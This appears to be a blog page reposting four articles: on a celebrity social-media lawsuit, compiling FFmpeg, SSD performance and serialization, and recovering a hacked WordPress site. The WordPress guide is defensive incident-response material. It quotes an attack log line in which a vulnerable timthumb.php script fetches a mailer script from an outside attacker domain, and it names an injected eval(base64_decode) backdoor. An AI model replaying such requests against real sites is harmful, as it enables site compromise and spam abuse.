
Thursday, June 26, 2014

How one tweet can land your company in court - TechRepublic


Take a cue from the Katherine Heigl, Duane Reade lawsuit and make sure your social media team knows its legal boundaries. 
Duane Reade might have sent the most expensive tweet in Twitter history. The New York City drug store chain is being sued by actress Katherine Heigl after it posted a picture in March of her coming out of one of its stores, saying "Love a quick #DuaneReade run? Even @KatieHeigl can't resist shopping #NYC's favorite drugstore http://bit.ly/1gLHctI."
The tweet seems fairly innocent -- a lighthearted mix of celebrity and self-promotion -- but Heigl is suing Duane Reade for the not-so-lighthearted sum of $6 million.
The problem started when Duane Reade found said picture of Heigl on celebrity gossip site Just Jared and posted it to its Twitter and Facebook accounts. Heigl asked the picture be removed. Duane Reade declined. Heigl sued. The complaint says Duane Reade "misused and misappropriated the photograph for its own commercial advertising, distributing the photo with Duane Reade's own promotional slogans on its Twitter and Facebook accounts, all without Ms. Heigl's knowledge or approval."
It specifically names violations of the Lanham Act (which prohibits things like trademark infringement and false advertising), Heigl's right to privacy and publicity (using name, image, or other likeness for commercial purposes) under New York State law, and unfair competition.
"I think this is a highly important case because it goes to show that there can be consequences if you're not careful in how you use social media, especially when it's to promote your business or your client or your products," said Pedram Tabibi, a business litigation and social media attorney in New York, as well as an adjunct professor of social media law at St. John's University School of Law.
What this means for social media professionals who are sloppy or uninformed when it comes to using images they don't legally have the right to use is that now, for the first time, legal action is on the table.
In a sense, it's always been on the table. In one of the more famous right-of-publicity cases, Bette Midler sued the Ford Motor Company in 1988 for using a sound-alike in one of its commercials. She won $400,000.
"Legal concerns that used to be the domain of only film photographers and print editors now must be part of the training for every company's social media manager," said Keva Silversmith, account director at the Max Borges Agency. "The precedent is really that every social brand manager needs to be trained like a journalist, particularly the legal pitfalls - defamation, privacy issues, and the laws around copyright and advertising."
Social media might just be the next plane where these laws are applied.
"I think just the fact that it was filed is really an eye-opening moment in terms of social media and advertising because it's certainly unlikely that this is the first time this has happened," Tabibi said.
So, how does a company avoid a trip to court? For one, thinking that you're on safe ground because "everyone does it" won't stop you from getting in trouble for violating someone else's rights.
Tabibi said it's wise to consult legal, or a knowledgeable person within the company, when crafting a social media policy or posting something that you're not sure about. It's also smart for a company to make sure its social media team knows how to spot potential legal pitfalls and knows when to bring in another opinion.
"Many people, be it students or professionals, twitch when they hear the word 'legal' and assume it's going to be a giant wet blanket on their creativity," said Dan Farkas, an instructor of strategic communication at Ohio University. "I've spoken with many lawyers who view PR as a rogue silo."
Open communication can prevent problems, especially in the early stages of planning strategy. "I suspect a social media team can sit around a table for an hour and come up with 20, 30 or 100 different likely scenarios. If those scenarios are vetted with the lawyer prior to the launch, everyone can agree on an action plan," Farkas said.
It's also worth knowing state-specific laws. Tabibi pointed out that in this case, at least with regard to New York, the privacy rights that were implicated in the complaint (New York Civil Rights Law 50 and 51) are not limited to celebrities.
"If you're using the name or picture of a non celebrity without their written consent for commercial purposes, that could also be an issue," he said.
He also sees the possibility for more of these claims to surface in the future given the growth of social media in marketing and advertising. "When you have a picture of somebody using your product, that seems really authentic," he said. "It would otherwise be a nice way to promote your product." That doesn't change the fact a company has to get permission.
There's been no action on the complaint since a motion was filed to admit an attorney from a different state.
Still, Tabibi said companies should be looking at this case as a wakeup call.

CompilationGuide/Ubuntu – FFmpeg


Compile FFmpeg on Ubuntu, Debian, or Mint


This guide for supported releases of Ubuntu, Debian, and Linux Mint will provide a local install of the latest FFmpeg tools and libraries, including several external encoding and decoding libraries (codecs). This will not interfere with repository packages.
You may also refer to the Generic FFmpeg Compilation Guide for additional information.
Recent static builds are also available for lazy people or those who are unable to compile.
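If you do decide to compile, the general shape of a local build looks roughly like the sketch below. This is only an outline under assumptions (it presumes the build tools and the libx264 development package are already installed from the repositories); the full guide walks through building each dependency and enabling many more codecs:
# Rough outline of a local FFmpeg build; paths and flags are illustrative, not the guide's exact steps
mkdir -p ~/ffmpeg_sources ~/ffmpeg_build ~/bin
cd ~/ffmpeg_sources
git clone https://git.ffmpeg.org/ffmpeg.git ffmpeg
cd ffmpeg
./configure --prefix="$HOME/ffmpeg_build" --bindir="$HOME/bin" --enable-gpl --enable-libx264
make -j"$(nproc)"
make install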

Monday, June 23, 2014

Performance at Scale: SSDs, Silver Bullets, and Serialization - High Scalability -


Performance At Scale: SSDs, Silver Bullets, And Serialization

This is a guest post by Aaron Sullivan, Director & Principal Engineer at Rackspace.
We all love a silver bullet. Over the last few years, the outcomes I've seen with Rackspace customers who start using SSDs have fallen mostly into two scenarios. The first scenario is a silver bullet—adding SSDs creates near-miraculous performance improvements. The second scenario (the most common) is typically a case of the bullet being fired at the wrong target—the results fall well short of expectations.
With the second scenario, the file system, data stores, and processes frequently become destabilized. These demoralizing results, however, usually occur when customers are trying to speed up the wrong thing.
A common phenomenon at the heart of the disappointing SSD outcomes is serialization. Despite the fact that most servers have parallel processors (e.g. multicore, multi-socket), parallel memory systems (e.g. NUMA, multi-channel memory controllers), parallel storage systems (e.g. disk striping, NAND), and multithreaded software, transactions still must happen in a certain order. For some parts of your software and system design, processing goes step by step. Step 1. Then step 2. Then step 3. That's serialization.
And just because some parts of your software or systems are inherently parallel doesn’t mean that those parts aren’t serialized behind other parts. Some systems may be capable of receiving and processing thousands of discrete requests simultaneously in one part, only to wait behind some other, serialized part. Software developers and systems architects have dealt with this in a variety of ways. Multi-tier web architecture was conceived, in part, to deal with this problem. More recently, database sharding also helps to address this problem. But making some parts of a system parallel doesn’t mean all parts are parallel. And some things, even after being explicitly enhanced (and marketed) for parallelism, still contain some elements of serialization.
How far back does this problem go? It has been with us in computing since the inception of parallel computing, going back at least as far as the 1960s(1). Over the last ten years, exceptional improvements have been made in parallel memory systems, distributed database and storage systems, multicore CPUs, GPUs, and so on. The improvements often follow after the introduction of a new innovation in hardware. So, with SSDs, we’re peering at the same basic problem through a new lens. And improvements haven’t just focused on improving the SSD, itself. Our whole conception of storage software stacks is changing, along with it. But, as you’ll see later, even if we made the whole storage stack thousands of times faster than it is today, serialization will still be a problem. We’re always finding ways to deal with the issue, but rarely can we make it go away.

Parallelization And Serialization

The table below provides an example of parallelism and serialization with a server and storage device, from the software application down to storage media. Individual steps in the process may support sophisticated queues and parallelization mechanisms. Even so, for any given transaction, and for some groups of transactions, the required steps still must occur in order. Time accumulates with each step. More time per transaction equates to fewer transactions per second.
This sequence of steps represents a simplified, small component – in this case, the storage component – of one server. There are a variety of other components at work in that same server. Certain other components (e.g., a database application) tend to be cumulatively chained to storage. We could create a similar sequence of steps for a database application, and where the database application leverages system storage, we would chain the two tables together. We could construct similar macro-level models for networks, web services, cache services, and so on. Many (or all) of these components are linked together to complete a transaction.
As stated earlier, each component involved in a transaction adds time to the cumulative baseline. Improving each part takes a different set of tools, methods, and skills. Often, when stuck with a performance problem, we think it’ll be easier to throw money at it and try to buy our way out. We buy more servers, more processors, faster disks, faster network cards and switches, and on and on. Sometimes, we get lucky with one of those silver bullets. But when we don’t get lucky, here’s what it looks like.
Suppose we’ve built the next killer application. It’s getting really popular, and breaking under the load. At the rate we’re growing, in 3 months, we’ll need a 10x performance improvement. What do we do?
We might place replicas of our system around the world at strategic locations to reduce network latency and demand on our core system. We might upgrade all of our servers and switches from 1 Gb/sec to 10 Gb/sec. We might add SSDs to various parts of our system. Suppose these improvements reduced 70% of our network-related processing time, and 99.9% (a ~1000x improvement) of our storage time. In our application (modeled below), that gets us an 83% improvement. That’s not even double the performance, and we’ve already made a substantial investment. At this point, you might be thinking, “We sped up storage so much that it’s not even visible on the graph anymore. How could a 1000x improvement in storage performance and a bunch of network expense only get us an 83% speed-up?”
The answer is in the graph. A 10x improvement overall requires that the cumulative execution time (left vertical axis on the chart) go from 3.0 to 0.3.
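To make the arithmetic concrete, here is a rough back-of-the-envelope version of that calculation. The per-tier split below is an assumption (the article's actual breakdown lives in its charts, which aren't reproduced here), chosen only to show how a ~1000x storage speed-up plus a 70% network improvement can still leave the total far from 10x:
# Assumed split of the 3.0-unit baseline across tiers (illustration only, not the article's data)
awk 'BEGIN {
  web_db = 1.48; net = 0.52; storage = 1.0;    # baseline times, summing to 3.0
  old = web_db + net + storage;
  new = web_db + net * 0.30 + storage / 1000;  # network 70% faster, storage ~1000x faster
  printf "baseline=%.2f improved=%.2f => %.2fx (~%d%% improvement)\n", old, new, old/new, (old/new - 1) * 100;
}'
# prints roughly: baseline=3.00 improved=1.64 => 1.83x (~83% improvement)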
Getting that 10x improvement will require vast improvements all across our environment. Let's suppose that the network cannot be sped up any further (getting our network providers to improve and getting the speed of light to improve are said by some to be equally difficult). The graph below is a sample of other changes and resultant speed-ups required to reach 10x.
Notice that we took four more major steps to achieve this kind of broad performance gain. First, we made a measurable improvement at the web and cache tiers, doubling their speed. Second, we did the same for the database tier, doubling its speed. That got us to a 3.16x overall performance improvement. Since that wasn't enough, we took a third step: we re-designed the whole platform and, through a heroic effort that touched all three tiers, made them 3x faster than they were at baseline. That got us to a 4.2x improvement in performance.
See how elusive that 10x speed-up is? Suppose we hired a bunch of superstars to help us complete the journey…
So, fourth, the superstars brought some amazing new skills, code, tools, and perspectives. We got the web, the cache, and the database tier to a 20x speed-up over the original design. We also made another 1000x improvement with the SSDs. That didn't do much for us, but one of those new hotshots swore up and down that all we needed was faster SSDs (even hotshots fall victim to silver-bullet obsession sometimes). In the end, we didn't quite hit 10x, unless we round up. Close enough.
Now, let’s get back to reality. If we really need these kinds of across-the-board massive speed-ups, think of the amazing demands that would be placed on our development teams. Let’s assess our teams and capabilities through a similar lens. Will we need 10x the developer skill? Will that 10x boost come from one person? Will we need 10x the staff? 10x the test resources? That’s probably not realistic, at least, not all at once. Finding the right places to invest, at the right time, is a critical part of the process.
And in the process, we need to stay methodical, analyze our gaps, and find the most prudent ways to fill them. In my experience, prudence isn’t exciting, but it works.
When faced with a scaling problem, many people often assume they can solve it by throwing hardware at it – that mythical silver bullet. If you think there’s an easy solution available, and it happens to have some SSDs, by all means, try it! If it’s not enough, prepare for a comprehensive journey. Apply what we’ve covered here with your own applications, your own infrastructure, and your own team. Be open minded; you might need across-the-board improvements to reach your goals. Engage superstars where you can, and keep an eye out for serialization; it’s the anti-silver bullet.

Are You Prepared Against A Hack? | Smashing Magazine


Are You Prepared Against A Hack?

“Danger: malware ahead!” and “This website may harm your computer” are the two sentences that I hate most and that I don’t want any of my clients to see when they open their website. If you have seen any of them on your own website, then I’ll bet you still remember your panic attack and how you struggled to get your website up and running ASAP.
Many great articles show how to prevent a website from being hacked. Unfortunately, unless you take it offline, your website is not and will never be completely unhackable. Don’t get me wrong, you still need to take preventive measures and regularly improve your website’s security; however, responding accordingly if your website does get hacked is equally important. In this article, we’ll provide a simple seven-step disaster-recovery plan for WordPress, which you can follow in case of an emergency. We’ll illustrate it with a real hack and specific commands that you can use when analyzing and cleaning the website.

Evaluate Your Assets

The first thing to figure out is which parts of your website are important and how crucial they are to your business’ success. This is called an assets evaluation. You might say that your entire website is important, but that would just be thinking of “important” generically. You have to think of your WordPress website as a group of components that work together to serve a single purpose, and some of which are more critical than others. The weight you allocate to a particular component will determine to a large extent your course of action in an emergency.
Let’s say you have an online shop built on WooCommerce, with a custom theme and a few extra plugins, including a contact form that is not very popular among your visitors and a gallery where you rarely upload pictures. You mainly generate profit from the WooCommerce cart because your business is to sell products online.
Imagine now that the WooCommerce plugin has a vulnerability and gets hacked. You have asked your hosting provider to clean the malware and fix the problem. They tell you that the WooCommerce plugin has been compromised and that they will update it, and they ask whether they may delete the website and restore it from a backup, which means you would lose the last 24 hours of data. Most certainly, you will say no to the restore because you cannot afford that kind of loss. You would want them to clean the website without losing any data.
However, if you know that only your gallery has been hacked, where your last upload was one month ago or where you post pictures that are unimportant to your revenue, then you would tell them to go ahead and restore the gallery from a backup — or even delete the gallery if that’s the fastest way to get the website up and running safely again.

Identify Who Can Help You

Once you are able to clearly identify the assets that are important to you, outline whom to contact for assistance if needed. While we'll provide details in this article on how to handle the rather technical parts of the recovery plan, no one really expects you to do any of that stuff. You will be good to go if you simply know how to respond and whom to ask for assistance.
  • Your Web hosting provider
    Most WordPress Web hosts offer some kind of security-related support. In many cases, they will be the first ones to let you know you’ve been hacked and to help with some diagnostics. They also might provide additional services, such as website backups, log analysis, automatic WordPress upgrades, plugin upgrades, regular security audits, malicious code cleaning, early malware notifications and website backup restoration. Research how many of these services your host provides, so that you know when to ask the host for assistance and not lose time in meaningless back-and-forth communication.
  • Your theme’s and plugins’ developers
    If you’re using a theme and plugins provided by third parties, always make sure that the developer will be able to provide support in case the theme or plugin is hacked. Always choose trusted developers because they will be ready to patch vulnerabilities in their product and help you implement the patch.

A KISS Disaster Recovery Plan

As stated, your website will never become unhackable. To be prepared for the worst, you’ll need a disaster recovery plan that restores the website to its normal working state as quickly as possible. KISS (keep it short and simple). It doesn’t need to be complex, and you just need to list a few steps to follow in an emergency.
I'll lay out my preferred recovery plan, illustrating each step with a real example: the WordPress TimThumb hack, which affected over 230 themes, over 30 plugins and more than 39 million Web pages as of early August 2011. I'll assume we're dealing with a hacked WooCommerce website, hosted on a platform running the following very popular hosting software: CentOS Linux 6.5, the cPanel/WHM control panel, the Apache Web server, the MySQL database server, and PHP 5.3.x.

1. DON’T PANIC!

Usually, a WordPress user learns that their website has been hacked from Google, by opening the website and seeing a defaced index page, or because their hosting provider has blocked public access to the website. However you find out, the most important thing is not to panic and to follow the plan below.
Let’s assume that you tried to open the website but saw an error message, denying you access to the website. You most probably contacted your host, which told you that the website was used to send unsolicited email and that, since you didn’t do it, it was most probably hacked. So, now you know: You’ve been hacked, and no matter how scary that is, keep calm.

2. COPY THE HACKED WEBSITE AND ALL ACCESS LOG FILES

This step is mandatory. Don’t ever skip it. You need a backup of the hacked website and all access log files in order to analyze the malicious code and find out how the hackers managed to access your website’s files and/or database.
Tip: You could use a tool to back up the website, but the fastest way is to access your website via SSH and use the following commands to create the backup:
mysqldump -uUSER -pPASSWORD DB_NAME > your-site-folder/DB_NAME.sql
tar zcvf backup.tar.gz your-site-folder
In our case, you’ll need to back up on a server that has cPanel. So, you have two options.
Manually back up the website
To back up your MySQL database, use the following command:
mysqldump -uUSER -pPASSWORD DB_NAME > /home/USER/DB_NAME.sql
Use this next command to fully back up the SQL dump and the folder that stores your website’s files:
tar zcvf backup_hacked.tar.gz /home/USER/DB_NAME.sql /home/USER/public_html
The file backup_hacked.tar.gz will be created and stored in your account’s home folder. If you’re on a cPanel CentOS server, also back up the following log files:
  • /var/log/messages
    This is the FTP log file for most systems that use Pure-FTPd.
  • /usr/local/apache/domlogs/YOURDOMAIN.COM
    This is the Apache access log.
  • /var/log/exim_mainlog
    This is the Exim mail-server log file.
  • /usr/local/cpanel/logs/access_log
    This is the cPanel file manager log file.
  • /var/log/secure
    This is the log file for SSH connections.
Use cPanel to fully back up your entire hosting account
This functionality is accessible from your cPanel by going to the “Create Backup” icon. A full cPanel backup should also include the Apache access logs. Manually copy the rest of the log files and add them to the archive file.
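As a sketch of that manual step (the paths are the ones listed above; reading files under /var/log generally requires root access on the server), the log files can be collected into their own archive next to the site backup:
# Collect the server log files into a separate archive (run as root on a cPanel/CentOS server)
mkdir -p /home/USER/hacked_logs
cp /var/log/messages /var/log/exim_mainlog /var/log/secure \
   /usr/local/apache/domlogs/YOURDOMAIN.COM \
   /usr/local/cpanel/logs/access_log /home/USER/hacked_logs/
tar zcvf /home/USER/logs_backup.tar.gz /home/USER/hacked_logs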

3. QUARANTINE THE WEBSITE

From the moment you have backed up till the moment the vulnerability is patched, your website should be in maintenance mode to prevent further data loss and hacks. Take it out of quarantine once you are sure that the vulnerabilities have been patched.
Going into maintenance mode properly is critical, so that your search engine rankings are not affected. Search engines constantly verify that pages still exist and haven’t changed. They check for two things when they open your website:
  • your Web server’s HTTP status response code,
  • the pages themselves and the content served to visitors.
HTTP status codes provide information about the requested page(s). An HTTP status code of 200 means that the page has been successfully found by the Web server, which then delivers it to the visitor. This is the only correct status code for content. There are other status codes for redirects: 301 (permanent redirect), 302 and 307 (temporary redirects). The status code for a website in maintenance mode is 503, which tells search engines that the website is temporarily unavailable. You can send this status code in combination with a particular HTTP header (Retry-After) to tell search engines to re-access the website after a set period of time.
Tip: Start by creating a nice HTML maintenance page to use during the quarantine. Don’t wait to be hacked before creating the maintenance page. Save the HTML page on your account or on another server so that you can use it without wasting time.
Putting your WordPress website in maintenance mode can be done in one of two ways.
Enable maintenance mode
Maintenance mode is built into WordPress. To enable it, create a file named .maintenance in your website's root folder. Add the following PHP code to the file:
<?php $upgrading = time(); ?>
This PHP code will make WordPress show the maintenance page until you delete the .maintenance file. You could also create a custom maintenance page.
Important: This method only redirects requests to your WordPress files. If an attacker has managed to upload a PHP file manager or a shell script, then that malicious file would still be accessible via a Web browser.
Use Apache mod_rewrite to redirect all requests to a custom HTML maintenance page
This solution is better because you'll be redirecting all requests, not just the ones that are handled by WordPress itself.
To do this, name your custom HTML maintenance page maintenance.html and upload it to your website’s root folder. You can use the following HTML code:
<title>Down For Maintenance</title>

<style type="text/css" media="screen">
 h1 { font-size: 50px; }
 body { text-align:center; font: 20px Helvetica, sans-serif; color: #333; }
</style>

<h1>Down For Maintenance</h1>

<p>Sorry for the inconvenience. We’re performing maintenance at the moment.</p>
<p>We’ll be back online shortly!</p>
Create an empty file named maintenance.enable in your website’s root folder.
Finally, add the following lines to your .htaccess file:
RewriteEngine On
RewriteCond %{REMOTE_ADDR} !^123.56.89.12
RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
RewriteCond %{SCRIPT_FILENAME} !maintenance.html
RewriteRule ^.*$ /maintenance.html [R=503,L]
ErrorDocument 503 /maintenance.html
Header Set Retry-After "14400"
Header Set Cache-Control "max-age=0, no-store"
Let’s break down these mod_rewrite lines:
  • RewriteEngine On
    Turn on the rewrite engine.
  • RewriteCond %{REMOTE_ADDR} !^123.56.89.12
    Don’t match your own IP address. This line is optional; use it to prevent redirection to the maintenance page for requests from your own IP.
  • RewriteCond %{DOCUMENT_ROOT}/maintenance.html -f
    Make sure that the page named maintenance.html exists.
  • RewriteCond %{DOCUMENT_ROOT}/maintenance.enable -f
    Make sure that the file named maintenance.enable exists, which enables and disables the maintenance page.
  • RewriteCond %{SCRIPT_FILENAME} !maintenance.html
    Don’t apply the redirect rule when displaying the maintenance page.
  • RewriteRule ^.*$ /maintenance.html [R=503,L]
    This rule stops further rewriting and returns a 503 status for every matching request.
  • ErrorDocument 503 /maintenance.html
    This serves maintenance.html as the body of the 503 response.
  • Header Set Retry-After "14400"
    Set the Retry-After header to 14400 (i.e. four hours).
  • Header Set Cache-Control "max-age=0, no-store"
    This prevents caching.
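Once these rules are in place, it's worth confirming that the server really answers with a 503 and the Retry-After header. A quick check (assuming curl is available; replace the domain with your own):
# Expect "HTTP/1.1 503 Service Unavailable" plus the Retry-After and Cache-Control headers
curl -sI http://YOURDOMAIN.COM/any-page/ | head -n 10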
At this stage, we have backed up the hacked website and put the live website in maintenance mode so that visitors do not see the hacked website and attackers cannot access the website via a browser.
Note: Now is the time to reset all of the passwords for your WordPress administrator account, for cPanel and for your FTP and email accounts.

4. RESTORE WEBSITE FROM A CLEAN BACKUP, OR REMOVE MALICIOUS CODE

There are two ways to clean a hacked website. The faster way is to completely delete the website and then restore it from a clean backup. This is easy to do but has two major disadvantages: You might lose some of your data, and you can’t be sure that the backups are clean. If you update your website only from time to time, then choose this method.
To make sure the backup is clean, scan it with antivirus software, although that won't guarantee that the files are clean. The rule of thumb is to compare the files from the backup with the files from the live website. Choose several infected files from the live website and then check the same files in the backup; if they are clean, then chances are that the whole backup is. Sometimes a hack affects your database rather than your files. In that case, you need to compare the database used by your live site with the backup of the same database. phpMyAdmin is a nice free tool for this because you can easily see the data in all of the tables; the downside is that it cannot automatically show you the differences between two databases, so you have to check all of the tables manually. One popular commercial tool for this is the MySQL Comparison Bundle.
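If you prefer the command line to phpMyAdmin, one rough way to compare the live database with a clean dump is to export the live database and diff the two files. This is only a sketch: the file names are placeholders, --skip-dump-date (if your mysqldump supports it) keeps the dump timestamp out of the diff, and row order can differ between dumps, so treat the output as a guide rather than an exact report:
# Dump the live (possibly infected) database, then compare it with a known-clean backup dump
mysqldump --skip-dump-date -uUSER -pPASSWORD DB_NAME > /home/USER/live_db.sql
diff /home/USER/clean_backup.sql /home/USER/live_db.sql | less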
The second way to clean the website is to find the affected files and database tables and remove the malicious code. Depending on the hack, cleaning them could be relatively easy or extremely complicated. In either case, you’ll have to be proficient in using Bash or Perl in order to edit text files and replace certain strings, so that you can simultaneously remove malicious code from multiple files.
Tip: If you don’t feel comfortable cleaning the malware yourself, contact your host to do it for you. Most good WordPress hosting providers offer this as a paid service. If that’s not an option with your host, then look for security companies or automated services that detect and clean malware. If you opt for an automated malware service, don’t rely on it completely. Attacks and infections evolve all the time, and no software product will automatically detect every single attack and remove all possible variations of a malicious code block. After using such a tool, manually review your files and database to make sure they are clean.
Our hypothetical WooCommerce website was most probably updated pretty often, with new orders and payments coming in. So, restoring the website from a backup is not an option due to the potential loss of data. This leaves us with the option of cleaning the malware. To do that, we need to know where the malware is located.
Our attackers have sent spam mails from our hosting account. The first step is to analyze one of the spam emails and see how the hackers managed to send it. If you don’t have access to the mail logs, then ask your hosting provider to check the logs for you. We’ll need the headers of the spam email sent from your account.
To find such an email, look for your cPanel user name in the /var/log/exim_mainlog file. If our user name is tuser, we would search the log file using the Linux grep command:
grep tuser /var/log/exim_mainlog
Most Exim mail servers will show records related to messages that were delivered and generated by PHP scripts:
2014-04-15 12:43:09 [19963] 1Wa7O1-0005Bz-Ex H=localhost (mailserver.com) [127.0.0.1]:43395 I=[127.0.0.1]:25 Warning: Test Spam Mail  : This message was sent via script. The details are as: SCRIPT_FILENAME=/home/tuser/public_html/wp-content/themes/premiumtheme/cache/wp-mails.php PWD=/home/tuser/public_html/wp-content REMOTE_ADDR=189.100.29.167.
As you can see, the log record provides many useful details:
  • SCRIPT_FILENAME
    This is the PHP script that sent the mail.
  • REMOTE_ADDR
    This is the IP address from which the email was sent.
If we check this PHP script, we’d find that it is not a part of WordPress’ core. In addition, we can block the remote IP address that sent the message, so that it cannot access our website again. The best way to block the IP address is to add the following line to your .htaccess file:
deny from 189.100.29.167
This wp-mails.php script is obviously not a part of WordPress' core, so we can delete it. We'll figure out later how this script was uploaded to the website. Finding all infected files is usually hard. As we mentioned, you can compare a clean backup with the live website. To do this, use the following command:
diff -r /path/to/hacked/site /path/to/clean/site
This command will show the differences between the two folders: new files, edited scripts and new folders. The point here is to quickly identify the differences and find the malicious back-door files. In our case, the diff output revealed that the hackers had added malicious code to the first line of the infected index.php script. Usually, hackers will infect many files, not just one, and will also add malicious code to existing lines of code, so that removing it is very hard.
Let's assume that our clean index.php file is the default WordPress index.php, in which line 14 is the define('WP_USE_THEMES', true); statement. The hackers have modified the file by adding malicious code to line 14, just before the WP_USE_THEMES definition. Use the Linux sed command to remove only the malicious code and keep the legitimate WordPress code.
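The exact injected code and the original sed command aren't reproduced here, so the following is a minimal sketch under an assumption: suppose the injection is a single eval(base64_decode('…')); statement prepended to line 14 (the payload below is made up for illustration):
# Hypothetical: line 14 now reads something like
#   eval(base64_decode('ZXZpbF9jb2RlKCk7'));define('WP_USE_THEMES', true);
# Strip only the injected eval(base64_decode(...)); part and keep the define() intact:
sed -i "s/eval(base64_decode('[^']*'));//g" /home/tuser/public_html/index.php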
The sed command uses a regular expression to find only the malicious code and remove it via substitution. You can combine it with the Linux find command to find all infected files and remove the malicious code. Of course, be very careful not to remove legitimate code.
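A sketch of that combination, reusing the same hypothetical pattern as above (test it on a copy of the files first, and review the changes afterwards):
# Apply the same substitution to every PHP file under the document root (GNU sed assumed)
find /home/tuser/public_html -type f -name '*.php' \
  -exec sed -i "s/eval(base64_decode('[^']*'));//g" {} +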

5. CHECK ARCHIVED LOGS FOR RECORDS OF ATTACK

Cleaning your website is just the first part of the recovery. More important is to find out how the attackers managed to do this. Usually, that information is kept in the server’s access log files, including for website access, FTP, SSH, the file manager and the control panel. Different vulnerabilities are exploited in very different ways, which is why you’ll need to be familiar with the structure of all of the access logs.
Tip: Some attacks are difficult to find, and log files that are even three to six months old will need to be checked. Keep your old log records for at least three months. Not many hosts keep logs that old, so start keeping them yourself! Also, reading logs is time-consuming and painful, so consider outsourcing that to a security specialist or to your Web host, if they offer such a service.
Now that our website is clean, we need to find out how the hackers managed to upload the wp-mails.php file to our account. The easiest way to do this is to check all of the log files and search for the wp-mails.php file (using the grep command). Upon checking the log files, we find the following record:
189.100.29.167 - - [12/Apr/2014:06:53:41 +1000] "GET /wp-content/themes/premiumtheme/timthumb.php?src=http://www.blogger.com.exl.ro/max/wp-mails.php HTTP/1.1" 301 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
Upon analyzing the log record, we notice the following information:
  • 189.100.29.167
    This IP address accessed the website and used the timthumb.php script.
  • premiumtheme/timthumb.php
    The timthumb.php script is a part of your premium theme.
  • http://www.blogger.com.exl.ro/max/wp-mails.php
    The wp-mails.php script was downloaded from the blogger.com.exl.ro domain name.
This log record clearly indicates that the wp-mails.php script was uploaded via the timthumb.php script, which is a part of our premium theme. Upon opening the timthumb.php script, we notice that it is an outdated version of the famous TimThumb project.

6. RESOLVE SECURITY VULNERABILITY

When you find the vulnerability, you’ll have to patch it accordingly. For example, if you find that a WordPress plugin is vulnerable, you’ll have to update it, delete it or limit access to it so that attackers cannot use it. After all, you don’t want your website to be hacked again right after you’ve cleaned it.
We’ve identified the source, and now it is time to resolve it before re-enabling the website. The best option is to update the script and replace it with the latest version, which you can download from the official TimThumb website. However, this solution might not be suitable because many theme vendors modify scripts and change code blocks to meet their own requirements. Another solution would be to delete the timthumb.php script and then ask your theme’s provider to issue an updated version of the entire theme. If the theme provider is reliable, then they would have already patched their theme for a vulnerability of that size.
For better security, temporarily “hide” the timthumb.php script from remote access until you update it by using .htaccess rules to allow access from certain IP addresses:
deny from all
allow from YOUR_IP
Deleting the template and reinstalling it once you obtain the new version from the vendor is also wise.

7. UNQUARANTINE WEBSITE, AND INFORM STAKEHOLDERS

Before you “unquarantine” your website, change all passwords for all accounts one more time. That’s the only way to make sure that the attackers will not be able to access the website through an affected account.
To unquarantine, simply remove the maintenance page and comment out the added lines in the .htaccess file.
You can also create a cron job that informs you if any file gets changed or a new file is uploaded. The following simple find command will find all files and folders that have been modified or created in the last 60 minutes:
find /home/tuser/public_html/ -mmin -60
A similar command is often used to display new images, CSS files or JavaScript files, but you can use it to keep an eye on files that have been uploaded to or modified on your hosting account.
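As a sketch of wiring that into cron (the schedule, path and address are placeholders, and the mail command assumes a working local mailer such as mailx; add the entry with crontab -e):
# Hypothetical crontab entry: every hour, email a list of files modified in the previous hour
0 * * * * find /home/tuser/public_html/ -type f -mmin -60 | mail -s "Changed files" you@example.com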
The last thing to do is analyze the whole situation one more time and decide whether to inform your visitors of the issue. In our case, the hackers sent some spam emails, and the important data in the MySQL database was not affected. However, in some situations you might have to inform users that a certain type of vulnerability has affected the website and then prompt them to change their password or account settings.

Conclusion

Web security is complicated. Analyzing logs is time-consuming, and an inexperienced user might need hours to find the right line in a log file. The same goes for cleaning malicious code, scanning a website, managing a database and so many other security-related tasks. If you’re not a developer or system administrator, then you’d need years to learn all of the technical details and to learn how to “unhack” a website. The good news is that you don’t have to deal with this all by yourself!
The one thing you need to do, no matter how inexperienced you are, is be aware of the problem and be ready to manage it. If you remember the following essential points, you will be able to resolve any WordPress vulnerability and clean your hacked website:
  • Know which parts of your website can be sacrificed for the greater good, and which are critical to your business.
  • Security consists of both technology and policy. Learn about security problems with WordPress, and develop an effective policy to monitor and respond to issues. Then, work with others (your Web host, security specialists, etc.) to resolve vulnerabilities as soon as possible.
  • Security is a journey, not a destination. Even if your website is secure today, it might be defaced tomorrow. Security is an ongoing battle, won alternately by the good guys and the bad guys. The problem can’t be solved once and for all, which is why you need a disaster recovery plan that you can use when your website is in jeopardy!